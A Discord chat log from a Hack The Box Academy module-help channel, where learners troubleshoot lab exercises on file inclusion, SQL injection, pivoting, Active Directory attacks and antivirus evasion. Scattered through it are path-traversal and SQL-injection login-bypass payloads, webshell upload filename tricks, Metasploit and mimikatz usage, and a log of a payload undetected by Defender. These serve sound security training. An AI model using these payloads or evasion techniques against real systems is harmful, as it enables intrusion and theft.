#modules
anyone finished or did the latest file inclusion exercise? how to solve it? the LFI dnt work tho
You can DM if you are still stuck on this one.
u solved file inclusion latest lab my man?
The skills assessment? Did this one a while back, so if it's been updated, I have not done the updated version.
Did you see the directory with ls?
Does anyone understand this question? I was doing it on the Pwnbox and I get a message saying that it can't resolve. Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths ("https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.
Exit the SSH session and try to run your command again
Hey guys ! Is there anyone fully understand the content of PendingIntents exploit in Android Dynamic Analysis module? If available hope that i can dm.
I suggest, for a much cleaner approach, you curl the website normally and save it into a .html file, and then I suggest using grep -oP (o for only matching and P for reg expressions), then sort those paths with | uniq. If you need me to clarify, let me know!
i found the answer to q1, i am struggling on q2 though have run nxc with various search keywords to no avail, i have also manually searched through the shares i gained access to with the domain user from q1, my only assumption based on inference from ||'Users||' is that i am looking for the password to ||'lab_adm||' which i cannot find with any search. can someone give me a small nudge?
Someone also facing this problem or it just me as I thought HTB community mods would assist me better in this
This machine is being so slow for me since yesterday idk why and keeps getting keep alive error again and again I tried to recompile the ligolo go script with keep alive time=60 etc etc
I'm stuck here too...
They updated it recently?
Which one can you name the sub topic?
HTB BB - File Inclusion - Final Skill Assessment
What issue you facing?
I am stuck on the same question. It seems to have no point which is working. I found some extra parameters but nothing works for gods sakes.
I can't find parameter vulnerable to file inclusion...
I have found one parameter that is reflecting first name from contact form...but I didn't manage to use it for File Inclusion... Also there is an api with few php endpoints, tried to find parameters there but unsuccessfully..
Lastly, there is one parameter on /api/image.php but it is returning error only
Something wrong with the quiz boxes?
it just doesn't seem to work, at first I had || inlanefreight.htb || in my /etc/hosts it didn't work, then I tried getting rid of it, it didn't work
it's just broken asf
I have the same findings there is also contact.php?region=
For me api/image.php?p=../../is returning 200
@slate zinc can you relay this to any of the staff?
this is broken, same results on the attackbox as well
I'm here, I will test, one sec
Followed all the commands in the pinned message, but i get this error
aye, thank you
Yeah but it shows that it cannot return :The image ||"http://LINK/api/image.php?p=./.J./etc/passwd"|| cannot be displayed because it contains errors.
solved it, thank you ❤️
Everything is working as intended
We can get that region parameter using some fuzzing and more fuzzing will get us the desired output
huh that is WEIRD
maybe it's just on this one server?
jhaddix the fuzzer! 😄
let me try switching regions
show me /etc/hosts
yeah
Hey man can you please check Attacking Enterprise Network and its sub topic Lateral Movement as my ligolo isn’t working properly and keeps getting me Keepalive and since yesterday that box is being too slow to operate
Even the fuzzing fails to give out something
This is from my kali box
Do you have your VPN connected + PwnBox up?
nope, it's one at a time, and here is the one from my pwnbox
Reset the target and try again
I've been doing that for the past 20 minutes lol, I just switched servers, let me try now
yup, switching servers worked
Thanks @sacred rock , you're the goat
What server were you trying?
It's env the directory not "venv".
how? send dm please
It is working for me on US 6
https://academy.hackthebox.com/module/77/section/854 I am following the "nibble attacking the first box" on my penetration tester learning path. The last part requires me to use msfconsole to hack into the machine with nibble blog file upload vulnerability. It worked for the manual method, but it fails in the metasploit with the error, msf exploit(multi/http/nibbleblog_file_upload) > exploit
[-] Exploit failed: Language option php is not supported. Expected one of [:default, :java, :jsp, :javascript, :python, :powershell]
[*] Exploit completed, but no session was created.
Hi, anyone on Skills Assessment II NoSQL ?
please help me guys
Please elaborate.
Also why i can't chat in #general can anyone tell me ?
I am on the penetration tester learning path
And it's the nibble box.
I have provided the rest of details.
Oh , sorry i don't know much on that but have you tried asking help on the help chatbox on htb site on the bottom right corner ?
Hey guys, i'm trying to use rsync and crontab to backup a folder to my local machine using the 127.0.0.1 loopback address, how do i do this? I keep getting a cron install error
I created two folders on my desktop:
•Source Folder
•Backup Folder
and a bash script called RSYNC_Backup.sh
#!/bin/bash
rsync -avz -e ssh path/to/source username@127.0.0.1:/path/to/backup
Generated an ssh keypair as well. But my crontab keeps failing to install which is:
Yooo some active people
***** /home/user/Desktop/RSYNC_Backup.sh
Finally
Wait a bot?
I figured it out
Yoooo I can send you a server link they can help ig
Wts this server and anyways
Thanks dude
It will be helpful
I need help with the Linux Fundamentals module
👋 Hello
Read and follow #welcome
Hey anyone any luck with File inclusion skill assessment
Hi everyone, just logged into my account and I see that a previously completed module has reset itself. What do?
edit: I think it was once called Web Fuzzing with ffuf, or something to that extent. Now its just Web Fuzzing
edit 2: I see a change has been announced in the academy-announcements channel. Anyone with similar issues, look there.
Hi, i'm doing "Model Deployment Tampering" of "Attacking AI - Application and System ", and even following the exact steps showed in the lesson, the mcp target gives me always the same results:
{
"code": 500,
"type": "InvalidWorkflowException",
"message": "Failed to parse yaml."
}
I also don't get how to use reverse shell starting from forwarded ports:
ssh htb-stdnt@<SERVER_IP> -p <PORT> -R 8000:127.0.0.1:8000 -L 8081:127.0.0.1:8081 -N
And finally even the msfconsole exploit fails with:
[*] Started reverse TCP handler on IP:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
[*] Using URL: http://IP:8080/HSyoCR6tWi7JJhR/
[*] Registering the model archive...
[*] Server stopped.
[*] Exploit completed, but no session was created.
Can anyone suggest me how to move ? I think i'm not getting it right.
I want upload.php and thats what I am requesting
i'm stuck con password obtained.... and then the token but the payloads always return the same error
If I can see the shell getting injection in the nginx log but when i am trying to run &cmd=pwd but nothing is getting returned
Hello world
This only works in parrot . Kali has some version issue …
Is anyone able to help me with the Linux Fundamentals module?
Question: Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt
DC01 WinRM is filtered, it says, when running an nmap scan on the ports. Don't know if there is something I'm missing here, but looking at the answer it doesn't seem so. Can anyone else verify if they are having issues as well?
This is for Windows Remote Management (WinRM) on Windows Lateral Movement
Linux Fundamentals, on the task scheduling module. The question asks: What is the Type of the service of the "dconf.service".
I did research on the types of services that run on linux.
My conclusion was it is a "User service" but its not the correct answer can anyone assist me.
I am there how can I help maybe i passed on where you need help
I'm on the rsync, crontab and ssh part
Where you make a local folder called to_backup and synced_backup
Nope I have not done that yet can you help me with task scheduling question
I just searched google for types
Of services or something, then tried each one
Maybe there is a command for it however
Do u want the answer?
Alright maybe I skipped the answer while googling thanks.
how are u approaching it?
I probably should have looked for a command that tells the type of the service 🤔
Review the content covered just after the RDP example in this paragraph section Lateral Movement From Windows.
got the flag now
oh yes I saw someone posted a command on the forum the command does not reveal anything it just gives an empty output but i did find the answer through googling
forgot i needed to proxy thru the machine and not just be satisfied with a regular tun interface @gray yacht
Yeh systemctl show dconf.service -p Type
Doesn't work for me
hello
https://academy.hackthebox.com/module/216/section/2300
Hello pls actually i'm struggling on 2 questions of my job role path modules concerning Windows Event logs
Could anyone help me pls?
Hello all. I hope you are well. I'm currently doing the Dynamic Port Forwarding with SSH and Socks Tunneling section in the Pivoting, Tunneling, and Port Forwarding module. Its asking me to connect to 172.16.5.19 using Dynamic Port Forwarding... except when I run "proxychains4 nmap -sn -v 172.16.5.0-200", there are some hosts that are up, and some that are down... but the IP Address 172.16.5.19 is showing as down in that list... but thats the ip it wants me to use to rdp. I reset the target 2 times... am I missing something?
No it wasn't. You had contact.php in there.
Hi, I have to contradict you. It ALSO works on KALI!
Hi, asking again if someone solved the file inclusion skill check?
I don't know if many have solved the latest one
The latest one is not the inlanefreight, it's something different.
Hi all, for the Active Directory Enumeration and Attacks module, Im given a network of 172.16.5.0/23, but im not able to get anything to answer fping or nmap requests in that range. It says all 510 hosts unreachable
Yo
I want to bump this because this is incredibly frustrating almost 2 hours later... I'm not sure what I'm doing wrong.
hi so for the ACL Abuse Tactics section of AD Enumeration and Attacks module, I am following the instructions as specified in the one question of the section but its denying me access when I try to change the password for the user. Can someone help me with this? I would post my output but it would probably spoil stuff.
he guys
Might it be your socks proxychains.conf file? DM me if you would like
Might need to add user to a group before you can change their password
ah ok forgot about that. I will try that
hi I tried that its not letting me do that. its denying me access when I try to add the user.
if anyone sees this later today, let me know if you are available for a DM tonight please. thanks
Hey guys quick question about local port forwarding, what is the utility of it I mean if ssh to a compromise host and he is running mysql localy for example, I can access it since i'm on the machine so what is the utility after it to do a local port forwarding on this service?
What if the machine doesn't have mysql client installed, only server?
ow so as i thought it is more to use you own tools on you machine that the host potentially don't have
It is just one example you find many more
Yeah, but the idea is exposing an internal port to outside
That is why is called forwarding, it is not just useful for hacking
okej I get it, it don't have to specially run on localhost right? Like imagine I want to ssh on my internal network from an other country I use then port forwarding from my router?
bumping again... same issues. I'm at wits end if anyone is able to provide any clarity... I've tried so many different random things I saw online to "fix" the issue, and nothing is getting me through.
Hello everyone
@prime mirage
I would like to learn how to hack
I am trying to understand what do you really wanted to say
how do i get into the general chat???
Discord Verification google it is in htb website
Try again I will try to answer
Hahah what I mean is from the example I have here on the module is that we do a localport forwarding from the host (3306 running locally) to our attacking machine. We use ssh for it. So in my head it was like "okej but if we can ssh to it we can access it internally so what is the purpose of it?" and you answered "What if the machine doesn't have mysql client installed, only server?" so I now understand that we do that to use our tools (from our attacker host) on the host we compromised. My next question was "does it have to be a service running on localhost to be able to do local port forwarding, or is it the same as doing a localport forwarding from my router (idk port 4444) to my personal pc (22) to be able to connect to my pc (so on my internal network of home) from another place (like another country)?"
If you run "ssh -L 1234:localhost:3306 user@ip", you are telling ssh to forward all traffic we send from our machine on port 1234 to 3306 on the remote host. SSH is facilitating the connection. (If im wrong correct me, but I'm on this module atm and this is my understanding, and partly from the reading as well)
Yeah I understand this part but like you can read above, if you can ssh on the machine, why should you do a local port forwarding since you already on the machine so you can access it ^^ but i understand now ty 🙂
i let echoes answer since he started typing. Im 90 percent I know the answer, but I'd rather let him answer so I don't say something incorrectly
This is port binding if I'm not wrong
Module says Local Port Forwarding?
But the concept is the same as what it concerns to the way you're telling the machine to forward or bind the port
Idk I am talking about the concept I didn't do any module
Port binding is forwarding but in your machine you say to send interact to the forwarded port
Kk. Im looking at a module right now, where I got that from. I'm just simply noting that the module was talking about executing a local port forwarding. Based on your responses, sounds like the same thing with different names.
Dang I type bad xd
This was to answer you as what you asked @tender nimbus yes you tell the remote machine to forward the port from outside via ssh
But you can also forward your own port from your machine
Gotcha. That makes sense.
I'm glad I could help
Yeah local port forwarding that's right
So with the above... when I get a response back, is the remote host sending back over port 3306, and then ssh forwarding it back to me on 1234?
Yes
I called it port binding I was wrong it is local port forwarding
But everything else I think is correct
I will check everything tomorrow to be completely sure and if there is something wrong I'll let you know
Hey i figured it out from chatgpt LOL, but given what the answer is i would have never gotten it tbh. When you get to that module just make sure you put spaces between the asterisks when making a crontab
hi im new
Hello, can i dm anyone for a nudge on the new sql injection fundamentals skills assessment.
No need to post in every channel..
oh
Hello everyone i'm preparing for an exam and i find that my skills on post-exploitation are weak
Any recommended module in HTB that will make me better?
Windows linux or both?
W gangf
Both but mostly windows
Since the exam will definitely contain an AD Set
For me linux was always easier in terms of privesc and Post-Exploitation but windows has alot of complex stuff that i decided after my exam i will try to learn windows as a OS so i can progress after
I would say
Windows privesc module
Windows lateral movement module
And Attacking and exploiting active directory
Can I hack on a fold
I'm kinda new
I got a friend with some scripts. That can disable a computer
Modules wouldn't be a fun experience on a phone
not sure you could run pwnbox via the browser, haven't tried it
IM NEW WHAT IS PWN
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Go through that
Hey is there anyone/anyplace i can ask for help on the new skills assessments? I asked in the default channels but nobody answered.
Anyone able to help with nosql injection skills assessment II
This is the channel for module help. Sometimes you just have to be patient or maybe try searching as it's likely someone already asked the question.
Does skills assessment not count for module?
It won't let me go in general
I already told you a couple times how to get access, please reserve chat here for modules
skill assessment is part of the module
Can anyone give me a hint for the new sql injection skills assessment
Can anyone help me in sql injection for learning
im trying to do the Fingerprinting part of the "information gathering- Web Edition" and its telling me to visit inlanefreight.com or curl using this command curl -s http://app.inlanefreight.local/index.php | grep '<meta name="generator"'
but its not working with either
There are several modules related to SQL injection on Academy
did you add it to your /etc/hosts?
no i forgot to do that
Bro why tf can't I access general
You have to verify your account, follow the instructions in #welcome
In the Skills Assessment - File Upload Attacks, has anyone done the Extra Exercise? If so, please dm.
Skills Assessment - SQL Injection Fundamentals it's stuffy. I did the old one without any problems, but I couldn't do the new one.
Name of academy
lol. bruh you're in the hack the box server. hack the box's academy.
Have you done the new Skills Assessment - File Inclusion?
hey everyone, I need a hand with nmap, specifically the service enumeration flag section. I'm not sure how I'm supposed to find which port to Netcat into, and I know darn well that there's gotta be a faster way to find the right port without sifting through a -p- nmap
I ran the scan with -p- & -sV and found the flag on one of the ports. Didn't even need to use nc.
Hi, I am really struggling with the Skills Assessment - File Inclusion assessment. I am basically totally lost at this moment, is there anyone that can help me?
Thank you so much dude! I did this first bruh
sudo nmap 10.129.2.49 -p- -sV -Pn -n --disable-arp-ping --packet-trace
nowhere near correct lol
Hi Epic, you can omit the packet-trace as it isn't necessary in 95% of the nmap scans you use.
cleans up the output a bit 🙂
Noted 🤙
Hi guys
Hi Guys, need help with Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows under Active directory enumeration and attack module
Within this section, I am on the Accessing DC03 Using Enter-PSSession subsection.
I don't know how to proceed with this subsection. I don't have the built-in administrator account's password and i was unable to crack it after performing DCSync. Any clue to help.
Below text is from HTB: I am not able to reproduce it
PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator
[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCAL
I don't think you are required to reproduce it.
„Can someone please help me? I'm stuck on the SQL Injection Fundamentals Skills Assessment — nothing seems to work, and I've already tried everything.”
I'm still at the login page.
Test every parameter, start basic, look for different responses.
Thanks for the reply! I’m still stuck though. I’ve tried the basic payloads like ' OR 1=1-- and admin'--, but I can’t seem to bypass the login. I’m not sure if I should be focusing on UNION injections or something else at this point. Any hints on how to proceed at the login page?
Make use of the cheat sheet provided in the module.
Is the Pwnbox not the one on the right side?
It's new so I don't have any idea what changed, but UNION select attacks are always the way to go I think.
Just keep adding the number of cols until you get a response
hello, i am doing hackthebox academy File upload attack module and i am stuck on whitelist filters, can anyone give tips, i found that filename="shell.php..jpg" and shell.php/.jpg is getting uploaded but i cannot even view the web page nor the execute code, please help me i have been stuck for 2 hours on this
what for @verbal finch
this is not a server with hackers for hire
if you lost your Google account, this isn't Google
Uhh
what questions do you need answered?
They lost their Google account. This is not Google support
ive used the cheatsheet, tons of other payloads and sqlmap too, nothing seems to be working, what might i be doing wrong
You are clearly missing something, test all parameters, hack with a goal
can anyone give me tip? i found upload vuln but php code does not execute what should i try
can anyone recommend me course for python scripting , automating or for ctfs ? i am done with basic python .
u guys how do i fix my lab tho?
Like most of my labs now become 403 error when i access the webpage , da hell?
Are you connected with VPN?
Hi everyone, i hope you are having a good day/afternoon. I'm doing the sqli new skill assessment from CWES path, the chattr one. I need some help please!!! T_T
Try resetting it I would say, usually fixes about 95% of issues
nah same thing , dif regions too , funny
hold on let me try , ithink just now cause it requires 5 mins waiting time i forgot about it
It is recommended to wait a few mins, usually not required as far as I'm aware
really huh, i just reset, same thing, let me reset the lab instance too
i will wait a while
anymore solutions? i still can't access
Hey guys, im stuck in lfi skill assessment part i cant get rce actually. There is file upload part and i tried to upload a php shell into it but ended up just seeing that php code in response when i was requesting the php file with &cmd=id query parameter. If anyone has completed or could give some hints i would be grateful
What are you trying to access exactly?
the webpage, sqli skill assess module, it shows me 404 not found or smtg
Try https instead of http
it worked but why tho? it should redirect https itself no?
Someone guide me
The server is only listening on port 443, port 80 may not be configured at all. Redirects have to be explicitly configured, which are not. If you actually read the skills assessment text, it speaks about intercepting https.
I am stuck on the second question in the password attacks 'Pass the Certificate' section. I've entered DC01 using pywhisker, found the administrator password, and can connect to CA01 as admin, but there is no flag on the CA01 admin’s desktop. It seems I need to get admin permissions for DC01. How can I achieve this?
Anyone here I can ask for attacking ai - application and system skill assessment?
same
anyone wana give a nudge on the sqli new assessment?
i am halfway tho like i assume is broken or smtg lol?
Were you able to get past the login page?
is academy having technical difficulties atm
Welcome to the HTB Status Page
this lab is very strange like i cant execute literally anything not even log poisoning allow_url_include is also disabled and no rfi chance i guess because of this
Module 25, Section 142 (Kerberos attacks - Unconstrained Delegation), I cannot connect via RDP. Seems to be some sort of legacy RDP on the system.
Has anyone succeeded?
I tried playing around with the /sec flags.
You might need to use a non-default port for your RDP connection. I'd double check the lab connection instructions.
I already am using the non default port.
You can DM if you'd like to show me what it looks like on your end.
in the courses for certifications the modules also include labs right? Not just theory
meaning, practice + theory
In Password Attacks - Skill Assessment (New), I logged in to ssh, configured chisel and got william pass, can anyone give me a hint to what to do next? I'm stuck..
Hey friends
Can somebody explain to me why the reverse tcp connection starts then suddenly closes?
(I used a base64 encoded payload on target script and nc on my host)
I'm back
yes
Hello I'm stuck in the skill assessment on the Information Gathering - Web Edition can you help me
ur in it
just press enter on your keyboard or type something and press enter and see if something pops up
in which lab?
oh it closes? hmmmmmmmmm send me dms let's debug it together
the last one
The nc closed right after that
go dms
Okay thanks
that lab is annoying though, where you got stuck or what hint you need?
when I try anything on the vhost I have errors while I'm connected to the vpn ( gobuster ..)
Updated /etc/hosts?
then try taking Pwnbox
I'm stuck at this one : || What is the API key in the hidden admin directory that you have discovered on the target system?||
You need to find vhost first
yo, im stuck at linux priv esc module, 1st challenge environment enumeration
ok I will try thanks
Hi all
I find thanks you
No problem
after that you crawling with what ? scrapy
Do it again
am I close ?
Use gobuster on the vhost you found
I already did it and find the admin thing
ok thank you for the hint you can delete
@sleek spruce I finish it thank you bro
Thanks , got it.
I'm asking regarding SQL Injection Fundamentals - Skills Assessment I managed to login but I'm really stuck on further enumeration, cannot get column number.
Hi again. Anybody help please
No problem
What is the name of the hidden "history" file in the htb-user's home directory? ( What is the answer here? )
If anyone wants to help me with the flag in the proxy module for the bug bounty hunter path, i would greatly appreciate it. i already got the cookie from the site once, using the fuzzing, but then the flag is a little tricky and wants you to fuzz for users with matching md5 cookie? just a little confused.
You can google this easily
for attacking and enumerating AD, for the bleeding edge vulnerabilities, how are you supposed to get the nopac.py file to run on your attack box? the attack box can't clone the repos and pulling all the files from your host box to the vm is just annoying AF
Hey did you resolve this? I’m having the same problem
Hello all - Question on the network foundations module - Skills Assessment
Can someone explain to me why this happens?
when connected through virtual machine i see :
```
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address            Foreign Address  State   PID/Program name
udp        0      0 0.0.0.0:41687            0.0.0.0:*                -
```
and in Parrot Terminal I see (which is ok):
```
Proto Recv-Q Send-Q Local Address            Foreign Address  State   PID/Program name
tcp        0      0 htb-a6urfndgqv.htb:http  0.0.0.0:*        LISTEN
tcp        0      0 localhost:ipp            0.0.0.0:*        LISTEN
tcp        0      0 0.0.0.0:ssh              0.0.0.0:*        LISTEN
tcp        0      0 0.0.0.0:sunrpc           0.0.0.0:*        LISTEN
tcp        0      0 localhost:5901           0.0.0.0:*        LISTEN  2316/Xtigervnc
udp        0      0 0.0.0.0:bootpc           0.0.0.0:*
udp        0      0 0.0.0.0:sunrpc           0.0.0.0:*
```
Hi All, I am trying to finish the "Skills Assessment - WordPress" located here https://academy.hackthebox.com/module/17/section/64
I cannot figure out the task "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download. "
I believe that CVE 2019-19985 https://www.exploit-db.com/exploits/48698 for the Email Subscribers plugin is the correct one.
Assuming that is the correct CVE, I cannot figure out how to use it to get the flag for the task. I've tried various URLs such as "curl http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/flag.txt" but it just says it doesn't exist.
Spent a lot of time Googling but this is as far as I got. Any help is appreciated.
Hello All, I cannot RDP into the machine in Active Directory Trust Attacks -> Abusing SQL Server Links Module. What can i do?
try with sudo too
Hi everyone,
I'm kinda stuck with the Web Fuzzing - skill assessment since it's been changed.
I try all I learned in the module but cannot figure out what the problem is.
If anyone who solved this can help, I'd appreciate it.
||/spoiler Hello guys quick question about sock tunneling, I did all the things that the module says and it works perfectly, i'm just curious about one thing, after doing a dynamic port forwarding on port 1234 and adding a sock4 127.0.0.1 1234 to my /etc/proxychains.config file, when I start an nmap on the target with proxychain it give me no open ports, not even the rdp one it says "filtered" but i can connect to it with proxychains any idea?||
I am having some trouble with the password attacks module, I'm not sure if the right file I need is included in the virtual environment. Would anyone be able to help with this?
Is there not the file in the resources of the module?
Where would I be able to see the resources for the module? I assumed it was included in the virtual environment
Not sure if this is the right module, or if it's applicable to the one you're working on, but some modules have additional resources (files) available to download outside of the virtual environment. They'll be next to the Cheat Sheet if they exist.
This is the introduction to John the Ripper, it asks me to crack user r0lf's password but I can't seem to find any password file or link to download resources on that section.
there's r0lf's hash in the section
Got it, thanks!
Just for fun, I decided to revisit the Intro to Windows Evasion Techniques module and see what would happen if I rewrote the example C# reverse shell from that module in Rust.
Turns out, it works even better — and is MUCH easier to cross-compile.
Hello everyone, I need some help with the File Inclusion Skills Assessment module. My basic idea for getting the flag in the root is as follows: the website has an upload form for applications. You can upload a webshell there. On the contact.php page, I found a hidden parameter called ?region=. This is probably used for LFI. The problem is that if the string (whether plain text or URL encoded) contains dots (.) or slashes (/), you get an error message: “region” parameter contains invalid characters. Does anyone have any idea how I can get around using dots and slashes?
Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?
Not really; it does teach you a lot of C# concepts, so if you're a fast learner like me, you can pick up those skills on the fly; no prior experience with C# necessary. However, translating the payloads into other programming languages after the fact is always fun regardless.
I've heard from other people that they tried in another language and it didn't work so they had to do it in C#.
Anyone able to help with nosql injection skills assessment II?
Hey, I need a help in Exploiting Web Vulnerabilities in Thick-Client Applications section in Attacking Common Applications module.
I don't know how to solve it
Currently doing Intro to SCCM, anyone have advice for the last question, seems 2 accounts are domain accounts but one you get a ||local admin password not domain||, and the other 2 accounts don't have access to DC
Spent 3 days trying to upload or execute in memory for the sccm skill assessment 3rd question. But always gets a connection related error during transfer. Am I going down a rabbit hole?
hey guys when trying to use ligolo to route my targets traffic to my new interface i be getting " Starting tunnel to root@dmz01 (00505694f875)
error: unable to start tunnel: unable to open tun interface 'causalargent' (tun.New device or resource busy)
"
Heyyy supposed I want to start...
I need an organized path .... Sequential I mean...
Can someone assist me
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@plush flint
Thank you I already did ..that and ... funny now idk what move to take... There are a lot I don't know what comes first what follows too
you could do the #cjca
Running ligolo with sudo on kali? That should fix the issue
anyone solved SQLI latest skill assessment? hit me up for real
I'm stuck on Skills Assessment - File Inclusion. Scenario:<sumace/>. I think the vulnerability is in thanks.php?n, and on the Apply page, I've uploaded a shell.docx zip file, but I don't understand where it's stored or how to interact with thanks.php?n. Everything I write just displays as text, and I've tried various methods, including creating a server using python3 and applying php filters, but nothing seems to work. Please help me.
https://academy.hackthebox.com/module/23/section/513
Hi!
I've received error in this module https://academy.hackthebox.com/module/227/section/2500
Noriben finished job with error. I tried to relaunch VM and it didn't help...
Can't insert the screenshot here, error while I tried to terminate Noriben by CTRL+C and error about ProcMon popped up "Unable to open 'Noriben_02_Oct....' for reading"
password attack , skill assessment ..
im trying to upload mimikatz.exe to Dc01 so i can access the administrators hash , but i keep running into this error , am i doing anything wrong ?
I am at the very same place right now. Let me check it out
Can I DM you? I had another idea, but don't want to give too much away.
k
Hello, i'm doing the Attacking GraphQL Skills Assessment and i'm a little bit stuck, i have gathered all the information and tried SQli without success
If someone can help me pls
That's the wrong endpoint for file inclusion, look for image.php in web application and you will get the lfi but from there im stuck also i cant get rce
What all have u tried?
i did Introspection Queries and collect every data like employees or api keys and tried SQL injection
gather what all queries you can run, ull need an api key to run that, that's where u get the sqli
ok i see thx
Right, but you can pick up on the C# that the module teaches very quickly — or at least I was able to; don't know about any others.
Anyone who was able to get RCE on the updated File Inclusion - Skills Assessment please dm me. Thanks a lot!
Are you still stuck on this question?
You can DM what you know and what you are trying.
Hello guys.
I’m learning Android hacking with Hack The Box Module “Android Application Dynamic Analysis”.
I’m getting errors when I want to resolve the task of “Hooking Java Methods”. Frida always says on my laptop : “Failed to spawn: agent connection closed unexpectedly”.
Please, can someone help ???
I’m using Macbook M1 and I use the process in the module.
Thanks in advance.
I try to use Pixel 6a as AVD it seems like it working but, in real, I can't have the answer.
The error in my terminal after some seconds is : "Failed to spawn: timeout was reached "
Interesting. The application uploads surely end up in the directory “http://IP:PORT/uploads”. Have you tried accessing elements in it yet? According to ffuf, /uploads definitely exists (Http response code: 301). the parameter for image.php is "?p=" right?
Hi, in the "Hunting Evil with Sigma (Splunk Edition)" module, i'm unable to rdp to the host, the Splunk webserver on the server works but not the rdp part of it (and i cant have two servers online at the same time)
is there another solution ?
✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅
I DID IT.
I USE PIXEL 6 AND THE LATEST VERSION OF FRIDA : VERSION 17.3.1
✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅
The sigma rules and config files are hosted on the previous section's target. One approach would be to work on the problem sequentially, copying the results on the previous target, pasting into your note-taking app of choice, then copy-pasting into the new target's splunk instance.
A more general tip (not necessarily what I would do in this case) is that you can transfer files to and from Pwnbox, which persists across sections.
hey, I need help, I'm stuck all the day in "Exploiting Web Vulnerabilities in Thick-Client Applications" section in "Attacking Common Applications" module. can you give me the response because I don't know how to find it even I do all steps.
Yeah unfortunately
hey I'm stuck with the last question of this module when I use metasploit I get a hash but no cleartext :
https://academy.hackthebox.com/module/112/section/1245
Did you try to crack it?
the hash yeah
You can DM with what you know and are trying.
not sure if the type was right tho
hashid wasn't giving me anything
I was using RAKP for the hash type but john wasn't giving me anything
Introduction to Windows Evasion Techniques
Page 3
Static Analysis
I can't log into the box — why does it say the password is incorrect?
xfreerdp /v:10.129.217.111 /u:Administrator /p:'Eva$i0n!' /dynamic-resolution /drive:SharedDrive,.
[10:27:31:938] [32629:32630] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[10:27:31:938] [32629:32630] [WARN][com.freerdp.crypto] - CN = EVASION-TARGET
[10:27:32:139] [32629:32630] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
Module: Wi-Fi Penetration Testing Basics
Section: Wi-Fi Penetration Testing Basics - Skills Assessment
Question: What is the password for the WiFi network with the BSSID D8:D6:3D:EB:29:D5?
As shown in the module, I am using the following command to capture the four-way handshake.
sudo airodump-ng wlan0mon -w HTB -c 1
But when I use aircrack-ng to crack the password with a wordlist, I get the following error message:
Packets contained no EAPOL data; unable to process this AP.
I've deauthed the connected client so that it would attempt to reconnect and I've let airodump-ng run for over 10 minutes. Does anyone know why the client is not doing the handshake?
"I can't connect to EVASION-DEV even though I'm using the correct credentials.
Introduction to Windows Evasion Techniques"
The lab VMs work a little different in this module compared to most. Those credentials are for the EVASION-DEV machine which you spawn from the Introduction section (page 1). The DEV machine doesn't stay active, simultaneously with the targets you spawn on other pages/sections.
Personally, I found it more convenient to set up my own dev environment on my own local machine and use the VPN option to connect to the lab for this module. You could feasibly switch back and forth between the sections though, if you're not as error-prone as I was!
Do you mean I should connect to the machine in section 1 and then not shut it down?
I just spun it up and am having no issues using the provided credentials.
Can you send the code exactly as it is, I’ll just change the IP.
You can DM, it's really no different than the example provided, but I also ignore the cert.
Having a problem with Windows Attack and Defense -Kerberoasting kali ssh instructions.
The Overview and Lab Environment section gives an ip or (depending on the section) but no kali information on the question. Can't get any of the ips to work.
Isn't that the target you spawn?
The target is WS01 windows server
Anyone willing to help trying to crack a RIPEMD-128 hash? It won't work for me, I don't think I am doing anything wrong am I?
Did you already crack it?
Nope... I went through the history and used the --show, but nothing...
If you didn't crack it show won't show it. To view the cracked password associated with that hash type you would need to include the format, like this for example:
```
└─$ john --format=ripemd-128 ripe.hash --show
REDACTED
1 password hash cracked, 0 left
```
You could always look at the content of the `john.pot` file if you wanted to look at all of the hashes cracked by JTR.
Looking at your screenshot, I also recommend changing the transparency in your terminal settings to zero, so you cannot see things behind it. IMO it makes for better screenshots in a report.
I'll do that, thank you!
If I recall correctly, the dev machine should stay up until you spin up a different machine in a different section. So if you intend to use only the machines provided and work through the material in order, you'll have to switch back and forth between sections to work on the dev machine, then your current target, then back to section 1 to spin up the dev again, and so on as you progress through the module.
There are many other modules which allow you to launch multiple machines from one section so you can seamlessly hop between multiple hosts as you work, which is very convenient, but this isn't how the Windows Evasion module is set up unfortunately.
Antivirus
[10/03/2025 10:21:06] Checking...
[10/03/2025 10:21:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus
